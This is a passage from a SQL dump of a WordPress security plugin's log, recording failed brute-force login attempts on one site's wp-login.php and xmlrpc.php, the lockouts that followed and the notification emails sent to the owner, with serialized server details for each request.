11:40:20',17799272,19290104,'https://bintara.com.my/test/wp-login.php',1,0,'192.99.200.69'),(25698,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:40:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:40:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:55:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:55:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:40:21','2019-09-21 11:40:20',17884264,19290104,'https://bintara.com.my/test/wp-login.php',1,0,'192.99.200.69'),(25699,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:40:21','2019-09-21 11:40:20',18090584,19290104,'https://bintara.com.my/test/wp-login.php',1,0,'192.99.200.69'),(25700,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMarfBTP0kPOVnb8jqrQAAAEU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"48832\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMarfBTP0kPOVnb8jqrQAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066090.1834\";s:12:\"REQUEST_TIME\";s:10:\"1569066090\";}}','notice','2019-09-21 11:41:31','2019-09-21 11:41:30',17798160,19288872,'https://bintara.com.my/blog/wp-login.php',1,0,'164.39.7.99'),(25701,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:41:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:41:30\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:56:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:56:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:41:31','2019-09-21 11:41:30',17882784,19288872,'https://bintara.com.my/blog/wp-login.php',1,0,'164.39.7.99'),(25702,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:41:31','2019-09-21 11:41:30',18088776,19288872,'https://bintara.com.my/blog/wp-login.php',1,0,'164.39.7.99'),(25703,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMbDDrcQxTmGrCWuaMJgAAAcY\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"49516\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMbDDrcQxTmGrCWuaMJgAAAcY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066092.8418\";s:12:\"REQUEST_TIME\";s:10:\"1569066092\";}}','notice','2019-09-21 11:41:34','2019-09-21 11:41:33',18314888,19611696,'https://bintara.com.my/blog/xmlrpc.php',1,0,'164.39.7.99'),(25704,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMjDDrcQxTmGrCWuaMLAAAAc4\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.148.68\";s:11:\"REMOTE_PORT\";s:5:\"58668\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMjDDrcQxTmGrCWuaMLAAAAc4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066124.5217\";s:12:\"REQUEST_TIME\";s:10:\"1569066124\";}}','notice','2019-09-21 11:42:06','2019-09-21 11:42:04',17799272,19290104,'https://bintara.com.my/2019/wp-login.php',1,0,'159.89.148.68'),(25705,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:42:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:42:04\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:57:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:57:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:42:06','2019-09-21 11:42:04',17884264,19290104,'https://bintara.com.my/2019/wp-login.php',1,0,'159.89.148.68'),(25706,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:42:06','2019-09-21 11:42:04',18090584,19290104,'https://bintara.com.my/2019/wp-login.php',1,0,'159.89.148.68'),(25707,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMjHkXpgmG5P@iB8kbOQAAAJY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"92.222.9.173\";s:11:\"REMOTE_PORT\";s:5:\"36446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMjHkXpgmG5P@iB8kbOQAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066124.7258\";s:12:\"REQUEST_TIME\";s:10:\"1569066124\";}}','notice','2019-09-21 11:42:06','2019-09-21 11:42:05',17797216,19288056,'https://bintara.com.my/wordpress/wp-login.php',1,0,'92.222.9.173'),(25708,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:42:05\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:42:05\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:57:05\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:57:05\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:42:06','2019-09-21 11:42:05',17881912,19288056,'https://bintara.com.my/wordpress/wp-login.php',1,0,'92.222.9.173'),(25709,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:42:06','2019-09-21 11:42:05',18087512,19288056,'https://bintara.com.my/wordpress/wp-login.php',1,0,'92.222.9.173'),(25710,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMj7fBTP0kPOVnb8jqsAAAAFU\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"92.222.9.173\";s:11:\"REMOTE_PORT\";s:5:\"37076\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMj7fBTP0kPOVnb8jqsAAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066127.4783\";s:12:\"REQUEST_TIME\";s:10:\"1569066127\";}}','notice','2019-09-21 11:42:08','2019-09-21 11:42:07',18312936,19609664,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'92.222.9.173'),(25711,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMlFiJ7D9Gn7wDPh8ZWgAAAMI\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.148.68\";s:11:\"REMOTE_PORT\";s:5:\"59668\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMlFiJ7D9Gn7wDPh8ZWgAAAMI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066132.1304\";s:12:\"REQUEST_TIME\";s:10:\"1569066132\";}}','notice','2019-09-21 11:42:13','2019-09-21 11:42:12',18313736,19612128,'https://bintara.com.my/2019/xmlrpc.php',1,0,'159.89.148.68'),(25712,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15: